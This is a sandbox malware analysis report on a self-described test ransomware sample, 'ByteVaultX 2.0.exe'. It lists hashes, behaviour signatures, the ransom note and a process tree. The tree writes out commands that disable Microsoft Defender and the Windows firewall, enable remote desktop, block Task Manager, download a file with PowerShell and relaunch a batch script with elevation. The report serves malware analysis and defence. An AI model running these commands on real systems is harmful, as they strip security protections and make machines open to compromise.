Resubmissions

22-05-2024 15:54

240522-tca45sgd54 10

22-05-2024 15:32

240522-syx1csfh7z 10

19-05-2024 21:56

240519-1tcgvsca5s 10

19-05-2024 21:54

240519-1sln5sbh9x 10

19-05-2024 21:53

240519-1rn3wabh6x 10

19-05-2024 20:56

240519-zq5hsshf3v 10

18-05-2024 09:15

240518-k76pvsda89 10

18-05-2024 00:54

240518-a9ph9acb22 10

Analysis

  • max time kernel
    971s
  • max time network
    980s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    19-05-2024 21:56

General

  • Target

    ByteVaultX 2.0.exe

  • Size

    9.9MB

  • MD5

    98e3408a9432d5046691c4cc744eb244

  • SHA1

    c1e9d2c89d2cb72ee2f0f11ef97b2cb07d070142

  • SHA256

    958e65dedf5f42e310cbf4e7ba87ce130c2b60d95afb1da8f7390f2002f6caa2

  • SHA512

    dd4451441a051a6e9cc1be16702aaea1ce0fee4bd78c30cde050636e573b0ec1fcae4cde654a1928c941410840b8d0f989932779fc59e7bf70ce444029e689d5

  • SSDEEP

    196608:ShFaRIk7AHkPkRJW9GNZA1HeT39Iig6eE9TFa0Z8DOjCdylNo1nz8QW7tx:tGFG8S1+TtIi+Y9Z8D8CclydoPx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg

Extracted

Path

C:\Encrypt\encrypt.html

Ransom Note
Your Files Have Been Encrypted Your Files Have Been Encrypted By The ByteVaultX Test-Ransomware The price for the Decryption is $0 in Bitcoin (BTC). Follow these steps to get your decryption: You Do It. But Remember this malware is Just For VMS This is a Test Ransomware Your Files Have Been Encrypted By The ByteVaultX Test-Ransomware Ask AI How to Use the Ransomware key with the decryption algorithm (in this case, the Fernet decryption algorithm) to decrypt each encrypted file. Save the decrypted data to new files or overwrite the original encrypted files if desired. You Will Also Have To install Python and cryptography Please note that the dercyption key is in the path C:\encrypt\Key.txt and please note you have infinite time For support, you can ask ai how to encrypt your data Trustet AI

Signatures

  • Renames multiple (157) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Blocklisted process makes network request 13 IoCs
  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 2 TTPs 50 IoCs
  • Loads dropped DLL 12 IoCs
  • Drops desktop.ini file(s) 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

    Using powershell.exe command.

  • Sets desktop wallpaper using registry 2 TTPs 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
    "C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4560
    • C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
      "C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
      2⤵
      • Loads dropped DLL
      • Drops desktop.ini file(s)
      • Suspicious use of WriteProcessMemory
      PID:5044
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5004
      • C:\Windows\SYSTEM32\netsh.exe
        netsh advfirewall set allprofiles state off
        3⤵
        • Modifies Windows Firewall
        PID:1908
      • C:\Windows\SYSTEM32\runas.exe
        runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"
        3⤵
          PID:1752
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html
          3⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:3484
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffa9063cb8,0x7fffa9063cc8,0x7fffa9063cd8
            4⤵
              PID:4260
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1940 /prefetch:2
              4⤵
                PID:4580
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:3800
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:8
                4⤵
                  PID:872
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
                  4⤵
                    PID:5052
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
                    4⤵
                      PID:1332
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 /prefetch:8
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2268
                    • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:8
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2244
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
                      4⤵
                        PID:2328
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1
                        4⤵
                          PID:2856
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
                          4⤵
                            PID:3048
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
                            4⤵
                              PID:3156
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1740,10107547138233678977,15751795947959346833,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5308 /prefetch:2
                              4⤵
                                PID:1512
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "
                              3⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4184
                              • C:\Windows\system32\reg.exe
                                reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                4⤵
                                  PID:2868
                                • C:\Windows\system32\reg.exe
                                  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                  4⤵
                                    PID:1168
                                  • C:\Windows\system32\reg.exe
                                    reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                    4⤵
                                      PID:4504
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                      4⤵
                                        PID:5008
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                        4⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3156
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2724
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3560
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4008
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1408
                                      • C:\Windows\system32\netsh.exe
                                        netsh firewall set opmode disable
                                        4⤵
                                        • Modifies Windows Firewall
                                        PID:1160
                                      • C:\Windows\system32\netsh.exe
                                        netsh firewall set opmode mode=DISABLE
                                        4⤵
                                        • Modifies Windows Firewall
                                        PID:1828
                                      • C:\Windows\system32\netsh.exe
                                        netsh advfirewall set currentprofile state off
                                        4⤵
                                        • Modifies Windows Firewall
                                        PID:3684
                                      • C:\Windows\system32\netsh.exe
                                        netsh advfirewall set domainprofile state off
                                        4⤵
                                        • Modifies Windows Firewall
                                        PID:3888
                                      • C:\Windows\system32\netsh.exe
                                        netsh advfirewall set privateprofile state off
                                        4⤵
                                        • Modifies Windows Firewall
                                        PID:2696
                                      • C:\Windows\system32\netsh.exe
                                        netsh advfirewall set publicprofile state off
                                        4⤵
                                        • Modifies Windows Firewall
                                        PID:2496
                                      • C:\Windows\system32\netsh.exe
                                        netsh advfirewall set allprofiles state off
                                        4⤵
                                        • Modifies Windows Firewall
                                        PID:2944
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4680
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2624
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                        4⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3268
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                        4⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1112
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2868
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3236
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
                                        4⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4560
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                        4⤵
                                        • Modifies registry class
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4820
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                          5⤵
                                            PID:3132
                                            • C:\Windows\system32\reg.exe
                                              reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                              6⤵
                                                PID:3464
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                6⤵
                                                  PID:2376
                                                • C:\Windows\system32\reg.exe
                                                  reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                  6⤵
                                                    PID:2724
                                                  • C:\Windows\system32\reg.exe
                                                    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                    6⤵
                                                      PID:1724
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                      6⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1736
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                      6⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1828
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                      6⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4504
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                      6⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2044
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                      6⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4488
                                                    • C:\Windows\system32\netsh.exe
                                                      netsh firewall set opmode disable
                                                      6⤵
                                                      • Modifies Windows Firewall
                                                      PID:1160
                                                    • C:\Windows\system32\netsh.exe
                                                      netsh firewall set opmode mode=DISABLE
                                                      6⤵
                                                      • Modifies Windows Firewall
                                                      PID:2064
                                                    • C:\Windows\system32\netsh.exe
                                                      netsh advfirewall set currentprofile state off
                                                      6⤵
                                                      • Modifies Windows Firewall
                                                      PID:1936
                                                    • C:\Windows\system32\netsh.exe
                                                      netsh advfirewall set domainprofile state off
                                                      6⤵
                                                      • Modifies Windows Firewall
                                                      PID:2560
                                                    • C:\Windows\system32\netsh.exe
                                                      netsh advfirewall set privateprofile state off
                                                      6⤵
                                                      • Modifies Windows Firewall
                                                      PID:2180
                                                    • C:\Windows\system32\netsh.exe
                                                      netsh advfirewall set publicprofile state off
                                                      6⤵
                                                      • Modifies Windows Firewall
                                                      PID:2328
                                                    • C:\Windows\system32\netsh.exe
                                                      netsh advfirewall set allprofiles state off
                                                      6⤵
                                                      • Modifies Windows Firewall
                                                      PID:2368
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                      6⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1960
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                      6⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3288
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                      6⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:888
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                      6⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1040
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                      6⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:652
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                      6⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4236
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                      6⤵
                                                      • Blocklisted process makes network request
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3596
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                      6⤵
                                                      • Modifies registry class
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2192
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                        7⤵
                                                          PID:1992
                                                          • C:\Windows\system32\reg.exe
                                                            reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                            8⤵
                                                              PID:2836
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                              8⤵
                                                                PID:1112
                                                              • C:\Windows\system32\reg.exe
                                                                reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                8⤵
                                                                  PID:948
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                  8⤵
                                                                    PID:3548
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                    8⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2644
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                    8⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:568
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                    8⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2836
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                    8⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4268
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                    8⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:3568
                                                                  • C:\Windows\system32\netsh.exe
                                                                    netsh firewall set opmode disable
                                                                    8⤵
                                                                    • Modifies Windows Firewall
                                                                    PID:652
                                                                  • C:\Windows\system32\netsh.exe
                                                                    netsh firewall set opmode mode=DISABLE
                                                                    8⤵
                                                                    • Modifies Windows Firewall
                                                                    PID:784
                                                                  • C:\Windows\system32\netsh.exe
                                                                    netsh advfirewall set currentprofile state off
                                                                    8⤵
                                                                    • Modifies Windows Firewall
                                                                    PID:1988
                                                                  • C:\Windows\system32\netsh.exe
                                                                    netsh advfirewall set domainprofile state off
                                                                    8⤵
                                                                    • Modifies Windows Firewall
                                                                    PID:4820
                                                                  • C:\Windows\system32\netsh.exe
                                                                    netsh advfirewall set privateprofile state off
                                                                    8⤵
                                                                    • Modifies Windows Firewall
                                                                    PID:888
                                                                  • C:\Windows\system32\netsh.exe
                                                                    netsh advfirewall set publicprofile state off
                                                                    8⤵
                                                                    • Modifies Windows Firewall
                                                                    PID:3436
                                                                  • C:\Windows\system32\netsh.exe
                                                                    netsh advfirewall set allprofiles state off
                                                                    8⤵
                                                                    • Modifies Windows Firewall
                                                                    PID:2192
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                    8⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:3624
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                    8⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4552
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                    8⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4488
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                    8⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2044
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                    8⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:3120
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                    8⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:5064
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                    8⤵
                                                                    • Blocklisted process makes network request
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2220
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                    8⤵
